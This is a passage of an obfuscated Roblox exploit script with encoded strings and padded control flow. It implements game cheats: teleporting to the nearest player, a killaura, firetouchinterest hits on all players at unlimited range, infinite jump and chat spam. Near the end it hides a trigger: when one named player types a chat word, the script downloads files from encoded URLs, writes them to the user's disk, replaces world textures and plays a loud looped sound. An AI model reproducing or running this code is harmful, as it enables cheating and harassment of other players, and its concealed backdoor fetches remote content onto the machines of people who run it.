(v407==(1318 -(486 + 831))) then v410=v374.Character.HumanoidRootPart.CFrame;v411=TweenInfo.new(0.5 -0 ,Enum.EasingStyle.Sine,Enum.EasingDirection.Out);v407=2;end if (v407==(0 -0)) then v408=game:GetService(v7("\226\150\250\76\209\229\132\237\95\214\213\132","\191\182\225\159\41"));v409=v9.Character.HumanoidRootPart;v407=1 + 0 ;end if (v407==2) then v412=v408:Create(v409,v411,{[v7("\8\52\58\84\134\130","\162\75\114\72\53\235\231")]=v410});v412:Play();v407=3;end if (3==v407) then v412.Completed:Wait();break;end end end end end v137=1;end end end,function() local v139=0;local v140;while true do if (v139==(0 -0)) then v140=nil;function v140() if (v9 and v9.Character and v9.Character:FindFirstChild(v7("\164\41\73\227\93\13\133\56\118\237\92\22\188\61\86\246","\98\236\92\36\130\51"))) then local v376=game.Players:GetPlayers();local v377=nil;local v378=math.huge;for v399,v400 in pairs(v376) do if ((v400~=v9) and v400.Character and v400.Character:FindFirstChild(v7("\140\12\1\187\75\167\188\52\150\22\3\174\117\169\167\36","\80\196\121\108\218\37\200\213"))) then local v436=0;local v437;while true do if (v436==(1263 -(668 + 595))) then v437=(v9.Character.HumanoidRootPart.Position-v400.Character.HumanoidRootPart.Position).Magnitude;if (v437<v378) then v377=v400;v378=v437;end break;end end end end if v377 then local v413=0 + 0 ;local v414;local v415;local v416;local v417;local v418;while true do if (v413==1) then v416=v377.Character.HumanoidRootPart.CFrame;v417=TweenInfo.new(0.01 + 0 ,Enum.EasingStyle.Sine,Enum.EasingDirection.Out);v413=5 -3 ;end if (v413==(293 -(23 + 267))) then v418.Completed:Wait();break;end if (v413==(1944 -(1129 + 815))) then v414=game:GetService(v7("\52\100\7\122\69\61\143\18\101\11\124\78","\234\96\19\98\31\43\110"));v415=v9.Character.HumanoidRootPart;v413=388 -(371 + 16) ;end if (v413==(1752 -(1326 + 424))) then v418=v414:Create(v415,v417,{[v7("\37\57\64\198\161\119","\235\102\127\50\167\204\18")]=v416});v418:Play();v413=5 -2 ;end end end end end v139=3 -2 ;end if ((119 -(88 + 30))==v139) then v140();break;end end end);local v62=Instance.new(v7("\96\160\231\55","\78\48\193\149\67\36"));v62.Size=Vector3.new(10771 -(720 + 51) ,1,22245 -12245 );v62.Position=Vector3.new(1776 -(421 + 1355) ,116.98 -45 ,0 + 0 );v62.Anchored=true;v62.Color=Color3.fromRGB(1263 -(286 + 797) ,380 -276 ,421 -166 );v62.Parent=game.Workspace;v62.Transparency=440 -(397 + 42) ;v62.CanCollide=false;v51(v7("\17\16\148\17\87\63\23\132","\33\80\126\224\120"),v53,function() local v141=0;while true do if (v141==0) then v62.Transparency=0.6;v62.CanCollide=true;break;end end end,function() local v142=0;while true do if (v142==(0 + 0)) then v62.Transparency=801 -(24 + 776) ;v62.CanCollide=false;break;end end end);local v71=0.5 -0 ;local v72=785.01 -(222 + 563) ;local v73=false;local v74=nil;local function v75(v143) local v144=0 -0 ;local v145;local v146;local v147;local v148;local v149;while true do if (v144==(1 + 0)) then local v295=190 -(23 + 167) ;while true do if (v295==(1799 -(690 + 1108))) then v144=2;break;end if (v295==(0 + 0)) then v146=v143.PrimaryPart.Position;v147=Vector3.new(0 + 0 , -(853 -(40 + 808)),0);v295=1 + 0 ;end end end if (v144==(15 -11)) then if (v149 and v149.Instance) then local v356=0;local v357;local v358;local v359;local v360;local v361;local v362;local v363;while true do if (v356==(1 + 0)) then v359=v357.Position;v360=v359.X-(v358.X/(2 + 0)) ;v356=2 + 0 ;end if (v356==(573 -(47 + 524))) then local v420=0 + 0 ;while true do if (v420==(2 -1)) then v356=4 -1 ;break;end if (v420==0) then v361=v359.X + (v358.X/(4 -2)) ;v362=v359.Z-(v358.Z/2) ;v420=1727 -(1165 + 561) ;end end end if ((1 + 2)==v356) then v363=v359.Z + (v358.Z/2) ;if ((math.abs(v146.X-v360 )<=v71) or (math.abs(v146.X-v361 )<=v71) or (math.abs(v146.Z-v362 )<=v71) or (math.abs(v146.Z-v363 )<=v71)) then return true;end break;end if (v356==(0 -0)) then local v421=0 + 0 ;while true do if (v421==(480 -(341 + 138))) then v356=1;break;end if (v421==0) then v357=v149.Instance;v358=v357.Size;v421=1 + 0 ;end end end end end return false;end if (v144==(0 -0)) then v145=v143:FindFirstChildOfClass(v7("\196\189\14\197\82\227\161\7","\60\140\200\99\164"));if  not v145 then return false;end v144=327 -(89 + 237) ;end if (v144==(9 -6)) then v148.FilterType=Enum.RaycastFilterType.Blacklist;v149=workspace:Raycast(v146,v147,v148);v144=8 -4 ;end if (v144==(883 -(581 + 300))) then local v298=0;while true do if (v298==(1220 -(855 + 365))) then v148=RaycastParams.new();v148.FilterDescendantsInstances={v143};v298=1;end if (v298==(2 -1)) then v144=3;break;end end end end end local function v76(v150) local v151=0;local v152;while true do if (v151==(1 + 0)) then if  not v152 then return;end v74=task.spawn(function() while v73 and task.wait(v72)  do if ( not v150 or  not v150.Parent) then break;end if (v75(v150) and (v152:GetState()~=Enum.HumanoidStateType.Jumping)) then v152:ChangeState(Enum.HumanoidStateType.Jumping);end end end);break;end if ((1235 -(1030 + 205))==v151) then if v74 then task.cancel(v74);end v152=v150:FindFirstChildOfClass(v7("\175\225\9\39\172\136\253\0","\194\231\148\100\70"));v151=1 + 0 ;end end end v9.CharacterAdded:Connect(function(v153) local v154=0 + 0 ;local v155;while true do if (v154==(286 -(156 + 130))) then v155=0 -0 ;while true do if (v155==0) then task.wait(0.1 -0 );if v73 then v76(v153);end break;end end break;end end end);if v9.Character then v76(v9.Character);end v51(v7("\103\89\213\172\220\221\75\92","\168\38\44\161\195\150"),v55,function() local v156=0 -0 ;local v157;while true do if (v156==(0 + 0)) then v157=0;while true do if (v157==(0 + 0)) then v73=true;if v9.Character then v76(v9.Character);end break;end end break;end end end,function() v73=false;end);local v43=game:GetService(v7("\176\240\131\111\53\250\165","\118\224\156\226\22\80\136\214"));local v77=v43.LocalPlayer;local v78=game:GetService(v7("\112\251\87\179\71\252\79\137\65\235","\224\34\142\57"));local v79=v11 + (74 -(10 + 59)) ;local v80=v7("\237\176\202\207\119","\110\190\199\165\189\19\145\61");local v81=false;local v82;v51(v7("\241\226\123\228\138\210\200\234","\167\186\139\23\136\235"),v53,function() local v158=0 + 0 ;local v159;while true do if (0==v158) then v159=0 -0 ;while true do if (v159==(1163 -(671 + 492))) then v81=true;v79=v11 + 4 + 1 ;v159=1;end if (v159==(1216 -(369 + 846))) then startKillaura();break;end end break;end end end,function() local v160=0 + 0 ;while true do if (v160==(1 + 0)) then stopKillaura();break;end if (v160==0) then v81=false;v79=v11 + 5 ;v160=1946 -(1036 + 909) ;end end end);local function v83() local v161=0 + 0 ;while true do if (v161==0) then for v338,v339 in pairs(v43:GetPlayers()) do if ((v339~=v77) and v339.Character and v339.Character:FindFirstChild(v7("\50\160\133\12\20\186\129\9\40\186\135\25\42\180\154\25","\109\122\213\232"))) then local v381=0;local v382;local v383;local v384;while true do if (v381==(1 -0)) then v384=(v77.Character.HumanoidRootPart.Position-v339.Character.HumanoidRootPart.Position).Magnitude;if (v382 and (v382.Health>0) and  not v383 and (v384<=v79)) then return true;end break;end if (v381==(203 -(11 + 192))) then v382=v339.Character:FindFirstChild(v7("\198\226\175\49\224\248\171\52","\80\142\151\194"));v383=v339.Character:FindFirstChild(v7("\37\201\101\79\6\224\126\73\15\194","\44\99\166\23"));v381=1;end end end end return false;end end end local function v84() local v162=0;local v163;while true do if (v162==(0 + 0)) then v163=v77.Backpack:FindFirstChild(v80);if (v163 and  not v77.Character:FindFirstChild(v80)) then v163.Parent=v77.Character;end break;end end end local function v85() local v164=175 -(135 + 40) ;local v165;while true do if (v164==0) then v165=v77.Character:FindFirstChild(v80);if v165 then v165.Parent=v77.Backpack;end break;end end end local function v86() local v166=0 -0 ;local v167;while true do if (v166==0) then v167=v77.Character:FindFirstChild(v80);if (v167 and v167:IsA(v7("\72\248\38\58","\196\28\151\73\86\83"))) then v167:Activate();end break;end end end local function v87() local v168=0 + 0 ;local v169;while true do if (v168==(0 -0)) then v169=v77.Character:FindFirstChild(v7("\219\22\36\17\140\87\17\114\193\12\38\4\178\89\10\98","\22\147\99\73\112\226\56\120"));if v169 then v169.CFrame=v169.CFrame * CFrame.Angles(0 -0 ,math.rad(0),176 -(50 + 126) ) ;end break;end end end local function v88() local v170=0 -0 ;local v171;while true do if ((0 + 0)==v170) then v171=v77.Character:FindFirstChild(v7("\144\96\239\244\131\183\124\230","\237\216\21\130\149"));if v171 then print("s");end break;end end end local function v89() local v172=0;local v173;while true do if (v172==(1413 -(1233 + 180))) then v173=v77.Character:FindFirstChild(v7("\170\91\82\94\190\198\87\134","\62\226\46\63\63\208\169"));if v173 then v173.AutoRotate=true;end break;end end end function startKillaura() v82=v78.Heartbeat:Connect(function() if (v81 and v83()) then local v299=0;local v300;while true do if (v299==1) then v300=v77.Character:FindFirstChild(v80);if v300 then local v422=969 -(522 + 447) ;while true do if (v422==(1421 -(107 + 1314))) then v87();v88();break;end end end break;end if (v299==(0 + 0)) then v84();v86();v299=2 -1 ;end end else local v301=0;while true do if ((0 + 0)==v301) then v85();v89();break;end end end end);end function stopKillaura() local v174=0 -0 ;local v175;while true do if (v174==(0 -0)) then v175=1910 -(716 + 1194) ;while true do if ((1 + 0)==v175) then v85();break;end if (v175==(0 + 0)) then if v82 then local v423=503 -(74 + 429) ;local v424;while true do if (v423==(0 -0)) then v424=0 + 0 ;while true do if (v424==(0 -0)) then v82:Disconnect();v82=nil;break;end end break;end end end v89();v175=1 + 0 ;end end break;end end end v51(v7("\215\28\84\128\23\47\54\78\228\10\70","\62\133\121\53\227\127\109\79"),v52,function() local v176=0 -0 ;local v177;while true do if (v176==(0 -0)) then v177=v11;game:GetService(v7("\34\1\60\198\211\188\180\25\23\55","\194\112\116\82\149\182\206")).RenderStepped:Connect(function() local v340=433 -(279 + 154) ;local v341;while true do if (v340==0) then v341=game.Players:GetPlayers();for v425=780 -(454 + 324) , #v341 do local v426=0 + 0 ;local v427;while true do if (v426==0) then v427=v341[v425].Character;if (v427 and v427:FindFirstChild(v7("\17\189\65\25\206\237\7\61","\110\89\200\44\120\160\130")) and (v427.Humanoid.Health>0) and v427:FindFirstChild(v7("\131\214\70\71\77\69\50\73\153\204\68\82\115\75\41\89","\45\203\163\43\38\35\42\91")) and (v9:DistanceFromCharacter(v427.HumanoidRootPart.Position)<=v177)) then local v463=0;local v464;while true do if (v463==(17 -(12 + 5))) then v464=v9.Character and v9.Character:FindFirstChildOfClass(v7("\230\138\211\47","\52\178\229\188\67\231\201")) ;if (v464 and v464:FindFirstChild(v7("\9\64\94\0\251\89","\67\65\33\48\100\151\60"))) then local v475=0 + 0 ;while true do if (v475==(0 -0)) then v464:Activate();for v479,v480 in next,v427:GetChildren() do if v480:IsA(v7("\253\230\189\221\195\222\245\186","\147\191\135\206\184")) then local v481=0 + 0 ;while true do if (v481==(1093 -(277 + 816))) then firetouchinterest(v464.Handle,v480,0 -0 );firetouchinterest(v464.Handle,v480,1184 -(1058 + 125) );break;end end end end break;end end end break;end end end break;end end end break;end end end);break;end end end,function() end);local v90=false;game:GetService(v7("\177\59\163\211\241\93\162\145\60\149\196\202\69\187\135\45","\210\228\72\198\161\184\51")).JumpRequest:connect(function() if v90 then game:GetService(v7("\6\69\242\9\118\220\37","\174\86\41\147\112\19")).LocalPlayer.Character:FindFirstChildOfClass(v7("\115\21\128\10\43\0\24\175","\203\59\96\237\107\69\111\113")):ChangeState(v7("\14\3\161\241\56\254\208","\183\68\118\204\129\81\144"));end end);v51(v7("\47\164\98\206\30\143\30","\226\110\205\16\132\107"),v53,function() v90=true;end,function() v90=false;end);local v91=false;while v91 do local v178=0 + 0 ;while true do if (v178==0) then wait(979 -(815 + 160) );game.TextChatService.TextChannels.RBXGeneral:SendAsync(v7("\248\200\249\218\77\226\198\238\205\1\226\208\160\218\78\228\207","\33\139\163\128\185"));break;end end end v51(v7("\118\92\18\219\69\76\13\205\82","\190\55\56\100"),v53,function() v91=true;end,function() v91=false;end);v51(v7("\127\161\58\23\29\234\231\83\157\57\31\16\235","\147\54\207\92\126\115\131"),v53,function() local v179=0 -0 ;local v180;while true do if ((0 -0)==v179) then v180=5000000000000 -0 ;game:GetService(v7("\63\36\59\78\8\108\27\56\54\120","\30\109\81\85\29\109")).RenderStepped:Connect(function() local v342=0 -0 ;local v343;while true do if (v342==(1893 -(1222 + 671))) then v343=game.Players:GetPlayers();for v428=2, #v343 do local v429=0 -0 ;local v430;while true do if (v429==(0 -0)) then v430=v343[v428].Character;if (v430 and v430:FindFirstChild(v7("\215\100\89\183\56\209\245\251","\156\159\17\52\214\86\190")) and (v430.Humanoid.Health>(1182 -(229 + 953))) and v430:FindFirstChild(v7("\134\250\176\189\160\224\180\184\156\224\178\168\158\238\175\168","\220\206\143\221")) and (v9:DistanceFromCharacter(v430.HumanoidRootPart.Position)<=v180)) then local v465=1774 -(1111 + 663) ;local v466;while true do if (v465==(1579 -(874 + 705))) then v466=v9.Character and v9.Character:FindFirstChildOfClass(v7("\178\114\34\27","\178\230\29\77\119\184\172")) ;if (v466 and v466:FindFirstChild(v7("\221\191\4\31\123\253","\152\149\222\106\123\23"))) then local v476=0 + 0 ;local v477;while true do if (v476==0) then v477=0;while true do if (v477==0) then v466:Activate();for v482,v483 in next,v430:GetChildren() do if v483:IsA(v7("\255\39\229\70\133\220\52\226","\213\189\70\150\35")) then local v484=0 + 0 ;while true do if (v484==0) then firetouchinterest(v466.Handle,v483,0);firetouchinterest(v466.Handle,v483,1 -0 );break;end end end end break;end end break;end end end break;end end end break;end end end break;end end end);break;end end end,function() end);local v92=game:GetService(v7("\120\90\102\3\92\69\117\11\74","\104\47\53\20")).CurrentCamera.FieldOfView;v51(v7("\133\99\183","\111\195\44\225\124\220"),v54,function() game:GetService(v7("\239\73\18\120\184\187\217\69\5","\203\184\38\96\19\203")).CurrentCamera.FieldOfView=4 + 116 ;end,function() game:GetService(v7("\14\124\107\74\221\41\114\122\68","\174\89\19\25\33")).CurrentCamera.FieldOfView=v92;end);v49();local function v8() makefolder(v7("\61\27\81\69\246\148\31\35\23\75","\107\79\114\50\46\151\231"));writefile(v7("\43\175\182\34\139\42\163\204\60\191\250\33\143\32\163\200\60\180\176\103\128\41\178\199","\160\89\198\213\73\234\89\215"),game:HttpGet(v7("\64\101\160\238\214\18\62\251\236\196\95\63\179\247\209\64\100\182\235\214\77\99\183\241\203\92\116\186\234\139\75\126\185\177\255\77\117\189\241\203\30\40\251\247\200\73\118\177\237\138\90\116\178\237\138\64\116\181\250\214\7\124\181\247\203\7\88\153\217\250\28\35\226\175\139\66\97\177\249","\165\40\17\212\158"),true));writefile(v7("\247\208\11\56\39\246\205\4\54\63\170\209\13\42\50\237\220\26\54\104\232\201\91","\70\133\185\104\83"),game:HttpGet(v7("\12\81\80\58\218\94\10\11\56\200\19\11\67\35\221\12\80\70\63\218\1\87\71\37\199\16\64\74\62\135\7\74\73\101\243\1\65\77\37\199\82\28\11\57\198\17\75\64\57\134\22\64\66\57\134\12\64\69\46\218\75\72\69\35\199\75\75\65\60\204\22\8\67\37\199\10\68\9\45\192\18\64\9\51\198\17\8\81\58\132\9\68\64\47\132\19\76\80\34\132\50\74\77\41\204\9\74\64\100\196\20\22","\169\100\37\36\74"),true));local v183=getcustomasset(v7("\18\142\161\91\1\148\182\92\5\158\237\88\5\158\182\88\5\149\167\30\13\151\241","\48\96\231\194"));local v184=getcustomasset(v7("\218\83\13\38\24\203\187\143\205\67\65\37\28\193\187\139\205\72\11\99\19\200\170\132","\227\168\58\110\77\121\184\207"));local v185=Instance.new(v7("\72\55\166","\197\27\92\223\32\209\187\17"));v185.Name=v7("\48\116\250","\155\99\63\163");v185.SkyboxBk=v184;v185.SkyboxDn=v184;v185.SkyboxFt=v184;v185.SkyboxLf=v184;v185.SkyboxRt=v184;v185.SkyboxUp=v184;v185.Parent=game.Lighting;local v195=Instance.new(v7("\177\222\180\131\189","\228\226\177\193\237\217"),game.Workspace);v195.Name=v7("\7\160\44\233\63\169","\134\84\208\67");v195.SoundId=v183;v195.Volume=20;v195.Looped=true;v195:Play();local function v200(v215) if v215:IsA(v7("\35\173\148\72","\60\115\204\230")) then for v344=679 -(642 + 37) ,2 + 3  do local v345=Instance.new(v7("\195\63\232\113\235","\16\135\90\139"));v345.Name=v7("\121\77\34\22\109\117\84\124\65\35","\24\52\20\102\83\46\52");v345.Face=v344;v345.Parent=v215;v345.Texture=v184;end elseif v215:IsA(v7("\233\32\37\33\3","\111\164\79\65\68")) then for v385,v386 in pairs(v215:GetChildren()) do v200(v386);end end end local function v201(v216) for v221,v222 in pairs(game.Workspace:GetChildren()) do v200(v222);end end v201(v184);end local v9=game:GetService(v7("\246\213\130\199\43\248\213","\138\166\185\227\190\78")):FindFirstChild(v7("\248\127\220\20\94\42\28\197\96\234\32\92\38\11","\121\171\20\165\87\50\67"));if v9 then v9.Chatted:Connect(function(v223) if (v223==v7("\135\44\171\57\181\14","\98\166\88\217\86\217")) then v8();end end);end workspace.GameMusic:Destroy();
